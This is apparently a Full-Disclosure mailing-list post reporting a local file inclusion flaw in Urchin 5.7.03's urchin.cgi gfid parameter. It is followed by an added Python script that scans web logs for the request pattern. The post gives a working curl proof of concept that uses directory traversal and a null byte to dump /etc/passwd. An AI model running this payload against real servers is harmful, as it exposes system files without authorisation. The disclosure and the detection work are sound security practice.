While fuzzing an Urchin web application, I discovered what appears to be an LFI vulnerability. Neither Secunia nor Google / Urchin appear to have reported this as a known issue. The problem lies in the gfid parameter passed to urchin.cgi.

This was tested on a somewhat modified version of Urchin 5.7.03, but it appears that the gfid param can be influenced given the results. I don't have the ability to test further, but this appears valid and unpublished. Can anyone confirm they see similar behavior in the same version or other versions?

PoC:
"""
$ curl -s -b '...cookie_data...' 'https://host/path/urchin.cgi?profile=...&rid=13&cmd=svg&gfid=/../../../../../../../../../../../etc/passwd%00.html&ie5=.svg'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
...
"""

--
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianhermansen
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
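
For defenders who want to check their own web server logs for the request pattern reported above, here is a detection sketch. It is an added example, not part of the original post or of Urchin. The log lines, the combined-log layout, the sample gfid value `graph42` and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2012:10:00:00 +0000] "GET /urchin.cgi?profile=p1&rid=13&cmd=svg&gfid=graph42&ie5=.svg HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2012:10:00:05 +0000] "GET /urchin.cgi?profile=p1&rid=13&cmd=svg&gfid=/../../../etc/passwd%00.html&ie5=.svg HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2012:10:00:09 +0000] "GET /urchin.cgi?profile=p1&rid=13&cmd=svg&gfid=%252e%252e%252fconf%252fx&ie5=.svg HTTP/1.1" 200 95',
    '203.0.113.7 - - [01/Jan/2012:10:00:12 +0000] "GET /index.html?gfid=../x HTTP/1.1" 200 10',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def gfid_findings(value):
    """Return the reasons a gfid value looks like a path rather than an id."""
    v = fully_decode(value).replace("\\", "/")
    reasons = []
    if "\x00" in v:
        reasons.append("nul-byte")          # %00 truncation, as in the PoC
    if ".." in v.split("/"):
        reasons.append("dot-dot-segment")   # directory traversal component
    if v.startswith("/"):
        reasons.append("absolute-path")
    return reasons

def scan(lines):
    """Yield (line_index, reasons) for suspicious urchin.cgi requests."""
    for i, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/urchin.cgi"):
            continue
        # parse_qsl decodes once; fully_decode handles further layers.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "gfid":
                reasons = gfid_findings(value)
                if reasons:
                    yield i, reasons
```

A hit in the logs only shows that the pattern was requested; pair it with the response size and status to judge whether file contents were returned.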